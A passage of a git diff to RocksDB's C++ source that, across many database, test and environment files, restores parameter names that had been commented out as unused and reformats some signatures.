InternalStats::HandleCFMapStats(std::map* cf_stats) { return true; } -bool InternalStats::HandleCFStats(std::string* value, Slice /*suffix*/) { +bool InternalStats::HandleCFStats(std::string* value, Slice suffix) { DumpCFStats(value); return true; } bool InternalStats::HandleCFStatsNoFileHistogram(std::string* value, - Slice /*suffix*/) { + Slice suffix) { DumpCFStatsNoFileHistogram(value); return true; } -bool InternalStats::HandleCFFileHistogram(std::string* value, - Slice /*suffix*/) { +bool InternalStats::HandleCFFileHistogram(std::string* value, Slice suffix) { DumpCFFileHistogram(value); return true; } -bool InternalStats::HandleDBStats(std::string* value, Slice /*suffix*/) { +bool InternalStats::HandleDBStats(std::string* value, Slice suffix) { DumpDBStats(value); return true; } -bool InternalStats::HandleSsTables(std::string* value, Slice /*suffix*/) { +bool InternalStats::HandleSsTables(std::string* value, Slice suffix) { auto* current = cfd_->current(); *value = current->DebugString(true, true); return true; } bool InternalStats::HandleAggregatedTableProperties(std::string* value, - Slice /*suffix*/) { + Slice suffix) { std::shared_ptr tp; auto s = cfd_->current()->GetAggregatedTableProperties(&tp); if (!s.ok()) { @@ -575,34 +574,34 @@ bool InternalStats::HandleAggregatedTablePropertiesAtLevel(std::string* value, return true; } -bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->imm()->NumNotFlushed(); return true; } bool InternalStats::HandleNumImmutableMemTableFlushed(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { + DBImpl* db, + Version* version) { *value = cfd_->imm()->NumFlushed(); return true; } -bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* db, + Version* version) { // Return number of mem tables that are ready to flush (made immutable) *value = (cfd_->imm()->IsFlushPending() ? 1 : 0); return true; } bool InternalStats::HandleNumRunningFlushes(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->num_running_flushes(); return true; } -bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* db, + Version* version) { // 1 if the system already determines at least one compaction is needed. // 0 otherwise, const auto* vstorage = cfd_->current()->storage_info(); @@ -611,74 +610,70 @@ bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* /*db*/, } bool InternalStats::HandleNumRunningCompactions(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->num_running_compactions_; return true; } -bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* db, + Version* version) { // Accumulated number of errors in background flushes or compactions. *value = GetBackgroundErrorCount(); return true; } -bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* db, + Version* version) { // Current size of the active memtable *value = cfd_->mem()->ApproximateMemoryUsage(); return true; } -bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* db, + Version* version) { // Current size of the active memtable + immutable memtables *value = cfd_->mem()->ApproximateMemoryUsage() + cfd_->imm()->ApproximateUnflushedMemTablesMemoryUsage(); return true; } -bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->mem()->ApproximateMemoryUsage() + cfd_->imm()->ApproximateMemoryUsage(); return true; } -bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, DBImpl* db, + Version* version) { // Current number of entires in the active memtable *value = cfd_->mem()->num_entries(); return true; } -bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, DBImpl* db, + Version* version) { // Current number of entries in the immutable memtables *value = cfd_->imm()->current()->GetTotalNumEntries(); return true; } -bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, DBImpl* db, + Version* version) { // Current number of entires in the active memtable *value = cfd_->mem()->num_deletes(); return true; } -bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, DBImpl* db, + Version* version) { // Current number of entries in the immutable memtables *value = cfd_->imm()->current()->GetTotalNumDeletes(); return true; } -bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* db, + Version* version) { // Estimate number of entries in the column family: // Use estimated entries in tables + total entries in memtables. const auto* vstorage = cfd_->current()->storage_info(); @@ -694,79 +689,77 @@ bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* /*db*/, } bool InternalStats::HandleNumSnapshots(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->snapshots().count(); return true; } bool InternalStats::HandleOldestSnapshotTime(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = static_cast(db->snapshots().GetOldestSnapshotTime()); return true; } -bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->GetNumLiveVersions(); return true; } -bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->GetSuperVersionNumber(); return true; } bool InternalStats::HandleIsFileDeletionsEnabled(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->IsFileDeletionsEnabled(); return true; } -bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* db, + Version* version) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->base_level(); return true; } -bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* db, + Version* version) { *value = cfd_->GetTotalSstFilesSize(); return true; } bool InternalStats::HandleEstimatePendingCompactionBytes(uint64_t* value, - DBImpl* /*db*/, - Version* /*version*/) { + DBImpl* db, + Version* version) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->estimated_compaction_needed_bytes(); return true; } -bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, - DBImpl* /*db*/, +bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, DBImpl* db, Version* version) { *value = (version == nullptr) ? 0 : version->GetMemoryUsageByTableReaders(); return true; } -bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* /*db*/, - Version* /*version*/) { +bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* db, + Version* version) { const auto* vstorage = cfd_->current()->storage_info(); *value = vstorage->EstimateLiveDataSize(); return true; } bool InternalStats::HandleMinLogNumberToKeep(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->MinLogNumberToKeep(); return true; } bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { const WriteController& wc = db->write_controller(); if (!wc.NeedsDelay()) { *value = 0; @@ -777,7 +770,7 @@ bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db, } bool InternalStats::HandleIsWriteStopped(uint64_t* value, DBImpl* db, - Version* /*version*/) { + Version* version) { *value = db->write_controller().IsStopped() ? 1 : 0; return true; } diff --git a/db/listener_test.cc b/db/listener_test.cc index 0ab129b1173..5b5f2266b31 100644 --- a/db/listener_test.cc +++ b/db/listener_test.cc @@ -46,11 +46,11 @@ class EventListenerTest : public DBTestBase { }; struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector { - virtual rocksdb::Status AddUserKey(const rocksdb::Slice& /*key*/, - const rocksdb::Slice& /*value*/, - rocksdb::EntryType /*type*/, - rocksdb::SequenceNumber /*seq*/, - uint64_t /*file_size*/) override { + virtual rocksdb::Status AddUserKey(const rocksdb::Slice& key, + const rocksdb::Slice& value, + rocksdb::EntryType type, + rocksdb::SequenceNumber seq, + uint64_t file_size) override { return Status::OK(); } virtual rocksdb::Status Finish( @@ -73,7 +73,7 @@ struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector { class TestPropertiesCollectorFactory : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) override { + TablePropertiesCollectorFactory::Context context) override { return new TestPropertiesCollector; } const char* Name() const override { return "TestTablePropertiesCollector"; } @@ -425,7 +425,7 @@ TEST_F(EventListenerTest, DisableBGCompaction) { class TestCompactionReasonListener : public EventListener { public: - void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) override { + void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override { std::lock_guard lock(mutex_); compaction_reasons_.push_back(ci.compaction_reason); } @@ -807,8 +807,7 @@ class BackgroundErrorListener : public EventListener { public: BackgroundErrorListener(SpecialEnv* env) : env_(env), counter_(0) {} - void OnBackgroundError(BackgroundErrorReason /*reason*/, - Status* bg_error) override { + void OnBackgroundError(BackgroundErrorReason reason, Status* bg_error) override { if (counter_ == 0) { // suppress the first error and disable write-dropping such that a retry // can succeed. diff --git a/db/malloc_stats.cc b/db/malloc_stats.cc index 6ea0d5e4744..7acca65123e 100644 --- a/db/malloc_stats.cc +++ b/db/malloc_stats.cc @@ -36,7 +36,7 @@ static void GetJemallocStatus(void* mstat_arg, const char* status) { } #endif // ROCKSDB_JEMALLOC -void DumpMallocStats(std::string* /*stats*/) { +void DumpMallocStats(std::string* stats) { #ifdef ROCKSDB_JEMALLOC MallocStatus mstat; const unsigned int kMallocStatusLen = 1000000; diff --git a/db/manual_compaction_test.cc b/db/manual_compaction_test.cc index f31a50b8191..039b9080ed3 100644 --- a/db/manual_compaction_test.cc +++ b/db/manual_compaction_test.cc @@ -46,9 +46,9 @@ class DestroyAllCompactionFilter : public CompactionFilter { public: DestroyAllCompactionFilter() {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& existing_value, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& existing_value, + std::string* new_value, + bool* value_changed) const override { return existing_value.ToString() == "destroy"; } diff --git a/db/memtable_list.cc b/db/memtable_list.cc index f7e43458026..8f710c2e970 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -152,7 +152,7 @@ bool MemTableListVersion::GetFromList(std::list* list, } Status MemTableListVersion::AddRangeTombstoneIterators( - const ReadOptions& read_opts, Arena* /*arena*/, + const ReadOptions& read_opts, Arena* arena, RangeDelAggregator* range_del_agg) { assert(range_del_agg != nullptr); for (auto& m : memlist_) { @@ -298,7 +298,7 @@ void MemTableList::PickMemtablesToFlush(autovector* ret) { } void MemTableList::RollbackMemtableFlush(const autovector& mems, - uint64_t /*file_number*/) { + uint64_t file_number) { AutoThreadOperationStageUpdater stage_updater( ThreadStatus::STAGE_MEMTABLE_ROLLBACK); assert(!mems.empty()); diff --git a/db/merge_test.cc b/db/merge_test.cc index c1b0cbfaefb..b6582b7a596 100644 --- a/db/merge_test.cc +++ b/db/merge_test.cc @@ -504,7 +504,7 @@ void runTest(int argc, const std::string& dbname, const bool use_ttl = false) { } } // namespace -int main(int argc, char* /*argv*/ []) { +int main(int argc, char *argv[]) { //TODO: Make this test like a general rocksdb unit-test rocksdb::port::InstallStackTraceHandler(); runTest(argc, test::TmpDir() + "/merge_testdb"); diff --git a/db/plain_table_db_test.cc b/db/plain_table_db_test.cc index 8fae9746d84..0b60332e53a 100644 --- a/db/plain_table_db_test.cc +++ b/db/plain_table_db_test.cc @@ -327,7 +327,7 @@ class TestPlainTableFactory : public PlainTableFactory { const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool /*prefetch_index_and_filter_in_cache*/) const override { + bool prefetch_index_and_filter_in_cache) const override { TableProperties* props = nullptr; auto s = ReadTableProperties(file.get(), file_size, kPlainTableMagicNumber, diff --git a/db/prefix_test.cc b/db/prefix_test.cc index 6ac3ffb5d7b..a4ed201dad1 100644 --- a/db/prefix_test.cc +++ b/db/prefix_test.cc @@ -126,10 +126,10 @@ class TestKeyComparator : public Comparator { return "TestKeyComparator"; } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; namespace { diff --git a/db/table_cache.cc b/db/table_cache.cc index 60092ff610c..4dc56935fbc 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -30,7 +30,7 @@ namespace rocksdb { namespace { template -static void DeleteEntry(const Slice& /*key*/, void* value) { +static void DeleteEntry(const Slice& key, void* value) { T* typed_value = reinterpret_cast(value); delete typed_value; } @@ -41,7 +41,7 @@ static void UnrefEntry(void* arg1, void* arg2) { cache->Release(h); } -static void DeleteTableReader(void* arg1, void* /*arg2*/) { +static void DeleteTableReader(void* arg1, void* arg2) { TableReader* table_reader = reinterpret_cast(arg1); delete table_reader; } diff --git a/db/table_properties_collector.cc b/db/table_properties_collector.cc index ed9f223cdda..a1f4dba97bb 100644 --- a/db/table_properties_collector.cc +++ b/db/table_properties_collector.cc @@ -12,8 +12,8 @@ namespace rocksdb { Status InternalKeyPropertiesCollector::InternalAdd(const Slice& key, - const Slice& /*value*/, - uint64_t /*file_size*/) { + const Slice& value, + uint64_t file_size) { ParsedInternalKey ikey; if (!ParseInternalKey(key, &ikey)) { return Status::InvalidArgument("Invalid internal key"); diff --git a/db/table_properties_collector.h b/db/table_properties_collector.h index 7216ec3190f..d8cd75689d5 100644 --- a/db/table_properties_collector.h +++ b/db/table_properties_collector.h @@ -73,7 +73,7 @@ class InternalKeyPropertiesCollectorFactory : public IntTblPropCollectorFactory { public: virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t /*column_family_id*/) override { + uint32_t column_family_id) override { return new InternalKeyPropertiesCollector(); } diff --git a/db/table_properties_collector_test.cc b/db/table_properties_collector_test.cc index bf382b4fddc..66c66c02531 100644 --- a/db/table_properties_collector_test.cc +++ b/db/table_properties_collector_test.cc @@ -82,9 +82,8 @@ class RegularKeysStartWithA: public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& user_key, const Slice& /*value*/, - EntryType type, SequenceNumber /*seq*/, - uint64_t file_size) override { + Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, + SequenceNumber seq, uint64_t file_size) override { // simply asssume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -134,7 +133,7 @@ class RegularKeysStartWithABackwardCompatible return Status::OK(); } - Status Add(const Slice& user_key, const Slice& /*value*/) override { + Status Add(const Slice& user_key, const Slice& value) override { // simply asssume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -162,8 +161,8 @@ class RegularKeysStartWithAInternal : public IntTblPropCollector { return Status::OK(); } - Status InternalAdd(const Slice& user_key, const Slice& /*value*/, - uint64_t /*file_size*/) override { + Status InternalAdd(const Slice& user_key, const Slice& value, + uint64_t file_size) override { // simply asssume all user keys are not empty. if (user_key.data()[0] == 'A') { ++count_; @@ -194,7 +193,7 @@ class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory, } } virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t /*column_family_id*/) override { + uint32_t column_family_id) override { return new RegularKeysStartWithAInternal(); } const char* Name() const override { return "RegularKeysStartWithA"; } @@ -204,7 +203,7 @@ class RegularKeysStartWithAFactory : public IntTblPropCollectorFactory, class FlushBlockEveryThreePolicy : public FlushBlockPolicy { public: - virtual bool Update(const Slice& /*key*/, const Slice& /*value*/) override { + virtual bool Update(const Slice& key, const Slice& value) override { return (++count_ % 3U == 0); } @@ -221,8 +220,8 @@ class FlushBlockEveryThreePolicyFactory : public FlushBlockPolicyFactory { } FlushBlockPolicy* NewFlushBlockPolicy( - const BlockBasedTableOptions& /*table_options*/, - const BlockBuilder& /*data_block_builder*/) const override { + const BlockBasedTableOptions& table_options, + const BlockBuilder& data_block_builder) const override { return new FlushBlockEveryThreePolicy; } }; diff --git a/db/version_builder.cc b/db/version_builder.cc index 48264d4d704..bab8d11f5a5 100644 --- a/db/version_builder.cc +++ b/db/version_builder.cc @@ -185,7 +185,7 @@ class VersionBuilder::Rep { } } - void CheckConsistencyForDeletes(VersionEdit* /*edit*/, uint64_t number, + void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number, int level) { #ifdef NDEBUG if (!base_vstorage_->force_consistency_checks()) { diff --git a/db/version_edit.cc b/db/version_edit.cc index ebfc10584c9..b01f7bbdf70 100644 --- a/db/version_edit.cc +++ b/db/version_edit.cc @@ -198,7 +198,7 @@ static bool GetInternalKey(Slice* input, InternalKey* dst) { } } -bool VersionEdit::GetLevel(Slice* input, int* level, const char** /*msg*/) { +bool VersionEdit::GetLevel(Slice* input, int* level, const char** msg) { uint32_t v; if (GetVarint32(input, &v)) { *level = v; diff --git a/db/version_set.cc b/db/version_set.cc index aea3a62fad6..0069d86c1dd 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -528,7 +528,9 @@ class LevelFileIteratorState : public TwoLevelIteratorState { for_compaction_, nullptr /* arena */, skip_filters_, level_); } - bool PrefixMayMatch(const Slice& /*internal_key*/) override { return true; } + bool PrefixMayMatch(const Slice& internal_key) override { + return true; + } bool KeyReachedUpperBound(const Slice& internal_key) override { return read_options_.iterate_upper_bound != nullptr && @@ -2654,7 +2656,7 @@ void VersionSet::LogAndApplyCFHelper(VersionEdit* edit) { } void VersionSet::LogAndApplyHelper(ColumnFamilyData* cfd, - VersionBuilder* builder, Version* /*v*/, + VersionBuilder* builder, Version* v, VersionEdit* edit, InstrumentedMutex* mu) { mu->AssertHeld(); assert(!edit->IsColumnFamilyManipulation()); diff --git a/db/version_set.h b/db/version_set.h index 1e60098a63b..5a1f8d07d64 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -792,7 +792,7 @@ class VersionSet { struct LogReporter : public log::Reader::Reporter { Status* status; - virtual void Corruption(size_t /*bytes*/, const Status& s) override { + virtual void Corruption(size_t bytes, const Status& s) override { if (this->status->ok()) *this->status = s; } }; diff --git a/db/version_set_test.cc b/db/version_set_test.cc index 090e074cf0d..625d4592264 100644 --- a/db/version_set_test.cc +++ b/db/version_set_test.cc @@ -76,9 +76,7 @@ class CountingLogger : public Logger { public: CountingLogger() : log_count(0) {} using Logger::Logv; - virtual void Logv(const char* /*format*/, va_list /*ap*/) override { - log_count++; - } + virtual void Logv(const char* format, va_list ap) override { log_count++; } int log_count; }; diff --git a/db/wal_manager_test.cc b/db/wal_manager_test.cc index b0d8beee8a6..9f5cf273d24 100644 --- a/db/wal_manager_test.cc +++ b/db/wal_manager_test.cc @@ -72,7 +72,7 @@ class WalManagerTest : public testing::Test { } // NOT thread safe - void RollTheLog(bool /*archived*/) { + void RollTheLog(bool archived) { current_log_number_++; std::string fname = ArchivedLogFileName(dbname_, current_log_number_); unique_ptr file; diff --git a/db/write_batch.cc b/db/write_batch.cc index 042be5ab2f3..91be9a0dfa6 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -171,7 +171,7 @@ WriteBatch::~WriteBatch() { delete save_points_; } WriteBatch::Handler::~Handler() { } -void WriteBatch::Handler::LogData(const Slice& /*blob*/) { +void WriteBatch::Handler::LogData(const Slice& blob) { // If the user has not specified something to do with blobs, then we ignore // them. } @@ -469,7 +469,7 @@ void WriteBatchInternal::SetSequence(WriteBatch* b, SequenceNumber seq) { EncodeFixed64(&b->rep_[0], seq); } -size_t WriteBatchInternal::GetFirstOffset(WriteBatch* /*b*/) { +size_t WriteBatchInternal::GetFirstOffset(WriteBatch* b) { return WriteBatchInternal::kHeader; } @@ -1003,7 +1003,7 @@ class MemTableInserter : public WriteBatch::Handler { return Status::OK(); } - Status DeleteImpl(uint32_t /*column_family_id*/, const Slice& key, + Status DeleteImpl(uint32_t column_family_id, const Slice& key, const Slice& value, ValueType delete_type) { MemTable* mem = cf_mems_->GetMemTable(); mem->Add(sequence_, delete_type, key, value, concurrent_memtable_writes_, diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 6f119634539..4fd156d9bae 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -434,7 +434,7 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { struct NoopHandler : public WriteBatch::Handler { uint32_t num_seen = 0; char expected_char = 'A'; - virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& key, + virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value) override { EXPECT_EQ(kKeyValueSize, key.size()); EXPECT_EQ(kKeyValueSize, value.size()); @@ -449,22 +449,22 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { ++num_seen; return Status::OK(); } - virtual Status DeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { + virtual Status DeleteCF(uint32_t column_family_id, + const Slice& key) override { ADD_FAILURE(); return Status::OK(); } - virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { + virtual Status SingleDeleteCF(uint32_t column_family_id, + const Slice& key) override { ADD_FAILURE(); return Status::OK(); } - virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, - const Slice& /*value*/) override { + virtual Status MergeCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& /*blob*/) override { ADD_FAILURE(); } + virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < kNumUpdates; } } handler; @@ -489,7 +489,7 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { struct NoopHandler : public WriteBatch::Handler { int num_seen = 0; - virtual Status PutCF(uint32_t /*column_family_id*/, const Slice& key, + virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value) override { EXPECT_EQ(kKeyValueSize, key.size()); EXPECT_EQ(kKeyValueSize, value.size()); @@ -500,22 +500,22 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { ++num_seen; return Status::OK(); } - virtual Status DeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { + virtual Status DeleteCF(uint32_t column_family_id, + const Slice& key) override { ADD_FAILURE(); return Status::OK(); } - virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { + virtual Status SingleDeleteCF(uint32_t column_family_id, + const Slice& key) override { ADD_FAILURE(); return Status::OK(); } - virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, - const Slice& /*value*/) override { + virtual Status MergeCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& /*blob*/) override { ADD_FAILURE(); } + virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < 2; } } handler; diff --git a/db/write_callback_test.cc b/db/write_callback_test.cc index 41488b8c76d..9edf1c1581e 100644 --- a/db/write_callback_test.cc +++ b/db/write_callback_test.cc @@ -55,7 +55,9 @@ class WriteCallbackTestWriteCallback1 : public WriteCallback { class WriteCallbackTestWriteCallback2 : public WriteCallback { public: - Status Callback(DB* /*db*/) override { return Status::Busy(); } + Status Callback(DB *db) override { + return Status::Busy(); + } bool AllowWriteBatching() override { return true; } }; @@ -73,7 +75,7 @@ class MockWriteCallback : public WriteCallback { was_called_.store(other.was_called_.load()); } - Status Callback(DB* /*db*/) override { + Status Callback(DB* db) override { was_called_.store(true); if (should_fail_) { return Status::Busy(); diff --git a/db/write_thread.cc b/db/write_thread.cc index 6d466e4fd23..7063469967b 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -434,8 +434,7 @@ void WriteThread::EnterAsMemTableWriter(Writer* leader, last_writer->sequence + WriteBatchInternal::Count(last_writer->batch) - 1; } -void WriteThread::ExitAsMemTableWriter(Writer* /*self*/, - WriteGroup& write_group) { +void WriteThread::ExitAsMemTableWriter(Writer* self, WriteGroup& write_group) { Writer* leader = write_group.leader; Writer* last_writer = write_group.last_writer; diff --git a/env/env_encryption.cc b/env/env_encryption.cc index ff7f0810719..6b688a66020 100644 --- a/env/env_encryption.cc +++ b/env/env_encryption.cc @@ -844,9 +844,7 @@ static void decodeCTRParameters(const char *prefix, size_t blockSize, uint64_t & // CreateNewPrefix initialized an allocated block of prefix memory // for a new file. -Status CTREncryptionProvider::CreateNewPrefix(const std::string& /*fname*/, - char* prefix, - size_t prefixLength) { +Status CTREncryptionProvider::CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) { // Create & seed rnd. Random rnd((uint32_t)Env::Default()->NowMicros()); // Fill entire prefix block with random values. @@ -875,9 +873,7 @@ Status CTREncryptionProvider::CreateNewPrefix(const std::string& /*fname*/, // in plain text. // Returns the amount of space (starting from the start of the prefix) // that has been initialized. -size_t CTREncryptionProvider::PopulateSecretPrefixPart(char* /*prefix*/, - size_t /*prefixLength*/, - size_t /*blockSize*/) { +size_t CTREncryptionProvider::PopulateSecretPrefixPart(char *prefix, size_t prefixLength, size_t blockSize) { // Nothing to do here, put in custom data in override when needed. return 0; } @@ -902,10 +898,8 @@ Status CTREncryptionProvider::CreateCipherStream(const std::string& fname, const // CreateCipherStreamFromPrefix creates a block access cipher stream for a file given // given name and options. The given prefix is already decrypted. -Status CTREncryptionProvider::CreateCipherStreamFromPrefix( - const std::string& /*fname*/, const EnvOptions& /*options*/, - uint64_t initialCounter, const Slice& iv, const Slice& /*prefix*/, - unique_ptr* result) { +Status CTREncryptionProvider::CreateCipherStreamFromPrefix(const std::string& fname, const EnvOptions& options, + uint64_t initialCounter, const Slice& iv, const Slice& prefix, unique_ptr* result) { (*result) = unique_ptr(new CTRCipherStream(cipher_, iv.data(), initialCounter)); return Status::OK(); } diff --git a/env/env_hdfs.cc b/env/env_hdfs.cc index 6dbbd86273d..d98020c76b3 100644 --- a/env/env_hdfs.cc +++ b/env/env_hdfs.cc @@ -598,13 +598,13 @@ Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) { // dummy placeholders used when HDFS is not available namespace rocksdb { -Status HdfsEnv::NewSequentialFile(const std::string& /*fname*/, - unique_ptr* /*result*/, - const EnvOptions& /*options*/) { - return Status::NotSupported("Not compiled with hdfs support"); + Status HdfsEnv::NewSequentialFile(const std::string& fname, + unique_ptr* result, + const EnvOptions& options) { + return Status::NotSupported("Not compiled with hdfs support"); } - Status NewHdfsEnv(Env** /*hdfs_env*/, const std::string& /*fsname*/) { + Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) { return Status::NotSupported("Not compiled with hdfs support"); } } diff --git a/env/env_test.cc b/env/env_test.cc index 8606bb12a11..7fd71a3c430 100644 --- a/env/env_test.cc +++ b/env/env_test.cc @@ -1248,36 +1248,33 @@ TEST_P(EnvPosixTestWithParam, WritableFileWrapper) { inc(0); } - Status Append(const Slice& /*data*/) override { - inc(1); - return Status::OK(); - } - Status Truncate(uint64_t /*size*/) override { return Status::OK(); } + Status Append(const Slice& data) override { inc(1); return Status::OK(); } + Status Truncate(uint64_t size) override { return Status::OK(); } Status Close() override { inc(2); return Status::OK(); } Status Flush() override { inc(3); return Status::OK(); } Status Sync() override { inc(4); return Status::OK(); } Status Fsync() override { inc(5); return Status::OK(); } - void SetIOPriority(Env::IOPriority /*pri*/) override { inc(6); } + void SetIOPriority(Env::IOPriority pri) override { inc(6); } uint64_t GetFileSize() override { inc(7); return 0; } - void GetPreallocationStatus(size_t* /*block_size*/, - size_t* /*last_allocated_block*/) override { + void GetPreallocationStatus(size_t* block_size, + size_t* last_allocated_block) override { inc(8); } - size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { + size_t GetUniqueId(char* id, size_t max_size) const override { inc(9); return 0; } - Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { + Status InvalidateCache(size_t offset, size_t length) override { inc(10); return Status::OK(); } protected: - Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) override { + Status Allocate(uint64_t offset, uint64_t len) override { inc(11); return Status::OK(); } - Status RangeSync(uint64_t /*offset*/, uint64_t /*nbytes*/) override { + Status RangeSync(uint64_t offset, uint64_t nbytes) override { inc(12); return Status::OK(); } diff --git a/env/io_posix.cc b/env/io_posix.cc index cf96795c443..c5b14d3effe 100644 --- a/env/io_posix.cc +++ b/env/io_posix.cc @@ -443,7 +443,7 @@ PosixMmapReadableFile::~PosixMmapReadableFile() { } Status PosixMmapReadableFile::Read(uint64_t offset, size_t n, Slice* result, - char* /*scratch*/) const { + char* scratch) const { Status s; if (offset > length_) { *result = 